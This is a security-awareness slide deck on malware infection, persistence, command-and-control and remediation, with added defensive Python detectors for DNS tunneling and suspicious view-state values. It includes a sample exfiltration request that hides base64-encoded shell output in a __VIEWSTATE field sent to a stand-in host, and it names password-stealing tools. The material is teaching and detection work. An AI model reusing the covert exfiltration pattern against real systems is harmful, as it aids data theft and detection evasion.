A few bits about Malware
A story about trojan horses and rats.
$ whoami
• Michael Hendrickx
• Senior Security Analyst @ HelpAG
• Vulnerability Assessments
• Social Engineering
• Presentations 
• Created new undetected* RAT for the company
• Belgian
* Until now 
Malware attacks: a real threat
• Malware has caused a lot of damage
• Many names: RATs, virus, Trojan, rootkit, ransomware, …
• Examples: Cryptolocker, Zeus, BlackEnergy, …
• Targets different platforms:
• Browsers
• Smartphones
• PCs
Malware attacks: stages
• Malware attacks come in 2 stages:
• Infection: exploited bugs, phishing, waterhole attacks, USB, unattended terminal, …
• Persistence: AV evasion, persistence, looting, CNC connectivity, lateral movement (“you’re in trouble”)
Malware attacks: infection
• Stage 1: modes of infection
• Exploited software bugs
• (Spear) phishing
• Waterhole attack
• Malicious USB
Malware attacks: infection
• Exploited software bugs
• Attacker hacks into vulnerable service
• Could be anything:
• SQL injection on website leads to code execution
• Poorly implemented upload functionality
• Unpatched server software
• Man in the Middle
• Weak passwords
• …
Malware attacks: infection
• Spear phishing
• Very specific message to single or very few victims
• Holds malicious payload
• Macro, PDF, renamed files, trojaned archives, …
• Or, links to a malicious file:
• Needs to be downloaded, so it won’t get caught by your AV.
Malware attacks: infection
• Waterhole attack
• Indirect targeted attack
• Attacker compromises sites that the victim probably visits.
• Exploits outdated browser or plugins
• Forces install of malware
“your flash player is outdated”
“you should update Java”
Malware attacks: infection
• Evil USB dongle
• USB peripheral can be anything
• USB hard drive / dongle
• Keyboard, WIFI / network adapter, microphone, …
• Hub with any of the above
• Example: USB rubber ducky
• Looks like dongle, is a keyboard
• Types 1000 words per minute
• Is only 30 USD
Malware attacks: stages
• On to stage 2:
• Infection: exploited bugs, phishing, waterhole attacks, USB, unattended terminal, …
• Persistence: AV evasion, persistence, looting, CNC connectivity, lateral movement
Malware attacks: persistence
• Stage 2: Persistence
• Execution persistence
• Ensure that our malware keeps on running
• CnC Connectivity
• Listen for commands
• AV Evasion / Hiding
• To prevent malware from being detected, removed
• Lateral movement
• Infect more machines
Malware attacks: Execution persistence
• Ensure malware keeps on running
• Startup folder
• Registry keys
• Automatic Services
• Browser plugins / helper objects
• You’re re-infected whenever the browser is opened
• Infected document templates
• Every time a Word/PowerPoint/Excel file is opened or created, you’re re-infected.
Use Microsoft’s Autoruns to see what processes start upon startup (https://technet.microsoft.com/en-us/sysinternals/bb963902.aspx).
Malware attacks: CnC connectivity
• Direct traffic
• Probably (hopefully) detected and blocked
• HTTP Tunnel
• May get detected by L7 firewalls
• “deep packet inspection”, pretty shallow
• HTTPS
• Difficult to see what’s happening, unless MITM.
• DNS Tunneling
• Usually gets “proxied” to target DNS server
• Do you monitor anomalies?
• Peer to peer WIFI network
• “Hi, I’m an ad-hoc wifi network”
• Up to 10 – 20 meters
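The DNS tunneling bullet above and the “DNS anomalies” item under Remediation both come down to the same check, so here is one added example (not from the slides) of what that monitoring can look like: a client that asks for many distinct, high-entropy subdomains of a single domain is the pattern to alert on. The query log, the made-up domain exfil-example.net and the thresholds are all constructed assumptions.

```python
import math
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed sample of (client, queried name) pairs, not from any real capture;
# "exfil-example.net" is a made-up domain standing in for a tunnel endpoint.
SAMPLE_QUERIES = [
    ("10.0.0.5", "www.microsoft.com"),
    ("10.0.0.5", "update.helpag.com"),
    ("10.0.0.7", "mail.google.com"),
    ("10.0.0.9", "v4gk2x1p9zq8r7m3.exfil-example.net"),
    ("10.0.0.9", "b8n3kq7w2zy6t1pl.exfil-example.net"),
    ("10.0.0.9", "c91mz4k7xq2rw8vn.exfil-example.net"),
    ("10.0.0.9", "q7x2z9kp4m1n8vb3.exfil-example.net"),
]


def shannon_entropy(s: str) -> float:
    """Bits per character; encoded data scores far higher than ordinary hostnames."""
    if not s:
        return 0.0
    freq = {c: s.count(c) / len(s) for c in set(s)}
    return -sum(p * math.log2(p) for p in freq.values())


def registered_domain(name: str) -> str:
    """Assumption: the last two labels are the registered domain (no public-suffix list)."""
    labels = name.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def find_tunnel_suspects(queries: List[Tuple[str, str]], min_unique: int = 4,
                         min_entropy: float = 3.0) -> List[Dict]:
    """Per (client, domain): many distinct high-entropy subdomains is the tunnel signature."""
    buckets: Dict[Tuple[str, str], set] = defaultdict(set)
    for client, name in queries:
        buckets[(client, registered_domain(name))].add(name.lower().rstrip("."))
    suspects = []
    for (client, domain), names in buckets.items():
        first_labels = [n.split(".")[0] for n in names if n != domain]
        if len(first_labels) < min_unique:
            continue
        mean_entropy = sum(shannon_entropy(l) for l in first_labels) / len(first_labels)
        if mean_entropy >= min_entropy:
            suspects.append({"client": client, "domain": domain,
                             "unique_subdomains": len(first_labels),
                             "mean_entropy": round(mean_entropy, 2),
                             "bytes_upstream": sum(len(l) for l in first_labels)})
    return suspects
```

Tune `min_unique` and `min_entropy` against your own resolver logs first; CDNs and some analytics domains also produce long random-looking labels and will show up until they are allow-listed.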
Malware attacks: hagrat CnC
• Encode / Encrypt / Obfuscate traffic
POST /css/cc.aspx HTTP/1.1
Accept: text/html;q=0.8,application/xml,*/*
Accept-Language: en-gb;q=0.8,en
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSION=laer8sp2miqisG0n2Ms1efjlj64; path=/
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Host: www.thisisafakedomain.com
Content-Length: 277
Connection: Keep-Alive
__VIEWSTATE=MTpNaWNyb3NvZnQgV2luZG93cyBbVmVyc2lvbiA2LjEuNzYwMV0NCkNvcHlyaWdodCAoYykgMjAwOSBNaWNyb3NvZnQgQ29ycG9yYXRpb24uICBBbGwgcmlnaHRzIHJlc2VydmVkLg0KDQpDOlxVc2Vyc1xoZW5kcmlja3hcb3duQ2xvdWQ+ZGlyIGM6Lw0KSW52YWxpZCBzd2l0Y2ggLSAiIi4NCg0KQzpcVXNlcnNcaGVuZHJpY2t4XG93bkNsb3VkPg;;.
Decoded __VIEWSTATE value:
1:Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\hendrickx\ownCloud>dir c:/
Invalid switch - "".
C:\Users\hendrickx\ownCloud>
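The request above hides command output in a parameter that is supposed to carry opaque ASP.NET view state, which is exactly why “pretty shallow” inspection misses it. As an added example (not the presenter’s tool or code), the check below decodes base64-looking form values and flags those that decode to console text; the slide’s POST body is the constructed input and the `SHELL_MARKERS` patterns are an assumption.

```python
import base64
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Constructed sample: the slide's POST body with the wrapped base64 joined into one value.
SAMPLE_BODY = (
    "__VIEWSTATE=MTpNaWNyb3NvZnQgV2luZG93cyBbVmVyc2lvbiA2LjEuNzYwMV0NCkNvcHlyaWdodCAoYykgMjAwOSBNaWN"
    "yb3NvZnQgQ29ycG9yYXRpb24uICBBbGwgcmlnaHRzIHJlc2VydmVkLg0KDQpDOlxVc2Vyc1xoZW5kcmlja3hcb3duQ2xvdW"
    "Q+ZGlyIGM6Lw0KSW52YWxpZCBzd2l0Y2ggLSAiIi4NCg0KQzpcVXNlcnNcaGVuZHJpY2t4XG93bkNsb3VkPg"
)
# Constructed control: binary data, which is what a genuine serialised view state looks like.
BENIGN_BODY = "__VIEWSTATE=" + base64.b64encode(bytes(range(256))).decode()
# Text a command shell echoes back; real ASP.NET view state never carries a banner or prompt.
SHELL_MARKERS = [
    re.compile(r"Microsoft Windows \[Version"),
    re.compile(r"^[A-Za-z]:\\[^\r\n]*>", re.M),  # C:\...> prompt
    re.compile(r"^[$#] ", re.M),                 # Unix-style prompt
]

def decode_b64_param(value: str) -> Optional[bytes]:
    """Base64-decode a form value, tolerating the URL-safe alphabet and stripped padding."""
    raw = unquote(value).strip().replace("-", "+").replace("_", "/")
    if len(raw) < 16 or not re.fullmatch(r"[A-Za-z0-9+/]+=*", raw):
        return None
    raw += "=" * (-len(raw) % 4)
    try:
        return base64.b64decode(raw, validate=True)
    except ValueError:
        return None

def printable_ratio(data: bytes) -> float:
    text = data.decode("latin-1")
    return sum(c.isprintable() or c in "\r\n\t" for c in text) / max(len(text), 1)

def inspect_form_body(body: str) -> List[Dict]:
    """Flag form parameters whose base64 payload decodes to console-like text."""
    findings = []
    for param in body.split("&"):
        name, _, value = param.partition("=")
        data = decode_b64_param(value)
        if data is None or printable_ratio(data) < 0.95:
            continue  # not base64, or a binary blob: the normal case for view state
        text = data.decode("latin-1")
        hits = [m.pattern for m in SHELL_MARKERS if m.search(text)]
        if hits:
            findings.append({"param": name, "markers": hits, "preview": text[:60]})
    return findings
```

Run it inside whatever already sees decrypted request bodies (a reverse proxy or L7 firewall), since, as the HTTPS bullet notes, on the wire there is nothing to decode without MITM.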
Malware attacks: hiding
• Hiding
• Download multiple stages: a dropper first, then the malicious payload (the real virus)
Malware attacks: hiding
• Multi stage download ensures the correct victim
• Dropper: “Can I reach the Internet?”
• “This is not the IP / company / country I’m targeting” → innocent payload (“Cool, I’ll install it”)
• Otherwise → malicious payload, the real virus (“Bingo!”)
Malware attacks: lateral movement
• Exfiltration of information
• Documents (%userprofile%\documents)
• Passwords (mimikatz, Lazagne)
• Browser history
• Emails, files, …
• Recon / Infect the network
• Ping other machines
• File shares
• (Sharepoint) portals
Remediation
• Human factor: don’t get infected
• Social Engineering exercises
• Awareness
• Alerting IT security (“Support, I think I did something wrong”)
• Technical factor: prevent, detect, destroy
• Tight controls on end points
• Monitor inbound programs (attachments, downloads, …)
• Monitor network usage
• DNS Anomalies, unidentified protocols, …
• Regular scanning with AV, IOC detectors, …
• Such as Loki: (https://github.com/Neo23x0/Loki)
Thank you!
Questions?
Don’t accept any USB dongles from me! 
CONTACT US | WWW.HELPAG.COM | INFO@HELPAG.COM
DUBAI, UAE
ARJAAN OFFICE TOWER,
OFFICE 1201 / 1208, PO BOX 500741
T +971 4 440 5666
F +971 4 363 6742
ABU DHABI, UAE
SALAM HQ BLDG,
BLOCK 6, EAST 1-16, OFFICE 503, PO BOX 37195
T +971 2 644 3398
F +971 2 639 1155
DOHA, QATAR
AL DAFNA – PALM TOWER
OFFICE 4803, WEST BAY, P.O. BOX 31316
T +974 4432 8067
F +974 4432 8069
